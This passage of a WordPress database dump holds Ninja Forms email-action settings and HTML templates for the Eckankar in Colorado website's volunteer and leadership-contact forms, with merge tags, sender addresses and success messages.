/>\r\n<td align=\"left\" valign=\"top\">Your information will be forwarded to the Colorado ECK Volunteer Coordinator and you will be contacted soon. If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_221},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website offering your services as an ECK volunteer.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_221}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_222}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_223}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_224}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_225}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #23507d\"><strong>Area(s) for which you have volunteered:</strong></span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>Book Discussions:</strong> {field:listmultiselect_228}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Community HU:</strong> {field:listmultiselect_232}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ECK Worship Service:</strong> {field:listmultiselect_233}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Email Newsletter Help:</strong> {field:listmultiselect_234}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Round Tables:</strong> {field:listmultiselect_235}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Satsangs:</strong> {field:listmultiselect_236}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Vahana:</strong> {field:listmultiselect_237}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE </strong><em>(Optional)</em><strong>: </strong>{field:textarea_229}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">Your information will be forwarded to the Colorado ECK Volunteer Coordinator and you will be contacted soon. If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(2504,94,'attach_csv','0','attach_csv','0'),(2505,94,'email_format','html','email_format','html'),(2506,94,'reply_to','','reply_to',''),(2507,94,'cc','','cc',''),(2508,94,'bcc','','bcc',''),(2509,94,'redirect_url','','redirect_url',''),(2510,94,'success_msg','','success_msg',''),(2511,94,'label','Send copy to user','label','Send copy to user'),(2512,94,'objectType','Action','objectType','Action'),(2513,94,'objectDomain','actions','objectDomain','actions'),(2514,94,'editActive','','editActive',''),(2515,94,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2516,94,'payment_gateways','','payment_gateways',''),(2517,94,'payment_total','0','payment_total','0'),(2518,94,'tag','','tag',''),(2519,94,'email_message_plain','','email_message_plain',''),(2520,94,'parent_id','24','parent_id','24'),(2521,95,'title','','title',''),(2522,95,'key','','key',''),(2523,95,'type','successmessage','type','successmessage'),(2524,95,'active','1','active','1'),(2525,95,'created_at','2018-01-03 11:45:20','created_at','2018-01-03 11:45:20'),(2526,95,'date_updated','2016-01-15','date_updated','2016-01-15'),(2527,95,'from_name','','from_name',''),(2528,95,'from_address','','from_address',''),(2529,95,'to','{wp:admin_email}','to','{wp:admin_email}'),(2530,95,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(2531,95,'email_message','{fields_table}','email_message','{fields_table}'),(2532,95,'attach_csv','0','attach_csv','0'),(2533,95,'email_format','html','email_format','html'),(2534,95,'reply_to','','reply_to',''),(2535,95,'cc','','cc',''),(2536,95,'bcc','','bcc',''),(2537,95,'redirect_url','','redirect_url',''),(2538,95,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(2539,95,'label','Success Message','label','Success Message'),(2540,95,'objectType','Action','objectType','Action'),(2541,95,'objectDomain','actions','objectDomain','actions'),(2542,95,'editActive','','editActive',''),(2543,95,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2544,95,'payment_gateways','','payment_gateways',''),(2545,95,'payment_total','0','payment_total','0'),(2546,95,'tag','','tag',''),(2547,95,'email_message_plain','','email_message_plain',''),(2548,95,'parent_id','24','parent_id','24'),(2549,96,'title','','title',''),(2550,96,'key','','key',''),(2551,96,'type','email','type','email'),(2552,96,'active','1','active','1'),(2553,96,'created_at','2018-01-03 11:45:20','created_at','2018-01-03 11:45:20'),(2554,96,'date_updated','2016-01-19','date_updated','2016-01-19'),(2555,96,'from_name','Eckankar in Colorado Volunteer Opportunities','from_name','Eckankar in Colorado Volunteer Opportunities'),(2556,96,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2557,96,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(2558,96,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(2559,96,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Eckankar in Colorado Volunteer Opportunities</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website.</p><br /><br />\r\n<p>You are receiving this submission because you are listed as the contact for <em>Eckankar in Colorado Volunteer</em>s.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has volunteered for service. Here is the information that <span style=\"color: #666666\">{field:textbox_221} {field:lastname_222}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_221}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_222}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_223}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_224}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_225}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Book Discussions:</strong> {field:listmultiselect_228}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Community HU:</strong> {field:listmultiselect_232}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ECK Worship Service:</strong> {field:listmultiselect_233}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Email Newsletter Help:</strong> {field:listmultiselect_234}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Round Tables:</strong> {field:listmultiselect_235}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Satsangs:</strong> {field:listmultiselect_236}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Vahana:</strong> {field:listmultiselect_237}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE </strong><em>(Optional)</em><strong>: </strong>{field:textarea_229}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n<br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Eckankar in Colorado Volunteer Opportunities</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website.</p><br /><br />\r\n<p>You are receiving this submission because you are listed as the contact for <em>Eckankar in Colorado Volunteer</em>s.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has volunteered for service. Here is the information that <span style=\"color: #666666\">{field:textbox_221} {field:lastname_222}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_221}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_222}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_223}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_224}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_225}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Book Discussions:</strong> {field:listmultiselect_228}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Community HU:</strong> {field:listmultiselect_232}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ECK Worship Service:</strong> {field:listmultiselect_233}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Email Newsletter Help:</strong> {field:listmultiselect_234}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Round Tables:</strong> {field:listmultiselect_235}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Satsangs:</strong> {field:listmultiselect_236}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Vahana:</strong> {field:listmultiselect_237}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE </strong><em>(Optional)</em><strong>: </strong>{field:textarea_229}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n<br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(2560,96,'attach_csv','0','attach_csv','0'),(2561,96,'email_format','html','email_format','html'),(2562,96,'reply_to','','reply_to',''),(2563,96,'cc','','cc',''),(2564,96,'bcc','','bcc',''),(2565,96,'redirect_url','','redirect_url',''),(2566,96,'success_msg','','success_msg',''),(2567,96,'label','Admin Email','label','Admin Email'),(2568,96,'objectType','Action','objectType','Action'),(2569,96,'objectDomain','actions','objectDomain','actions'),(2570,96,'editActive','','editActive',''),(2571,96,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(2572,96,'payment_gateways','','payment_gateways',''),(2573,96,'payment_total','0','payment_total','0'),(2574,96,'tag','','tag',''),(2575,96,'email_message_plain','','email_message_plain',''),(2576,96,'drawerDisabled','','drawerDisabled',''),(2577,96,'parent_id','24','parent_id','24'),(2578,97,'title','','title',''),(2579,97,'key','','key',''),(2580,97,'type','save','type','save'),(2581,97,'active','1','active','1'),(2582,97,'created_at','2018-01-03 11:46:01','created_at','2018-01-03 11:46:01'),(2583,97,'label','Save Form','label','Save Form'),(2584,97,'parent_id','25','parent_id','25'),(2585,98,'title','','title',''),(2586,98,'key','','key',''),(2587,98,'type','email','type','email'),(2588,98,'active','0','active','0'),(2589,98,'created_at','2018-01-03 11:46:01','created_at','2018-01-03 11:46:01'),(2590,98,'date_updated','2016-01-15','date_updated','2016-01-15'),(2591,98,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(2592,98,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(2593,98,'to','{field:email_324}','to','{field:email_324}'),(2594,98,'email_subject','Western Slope Leadership Communication','email_subject','Western Slope Leadership Communication'),(2595,98,'email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_322},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_322}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_323}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_324}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_327}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n','email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" 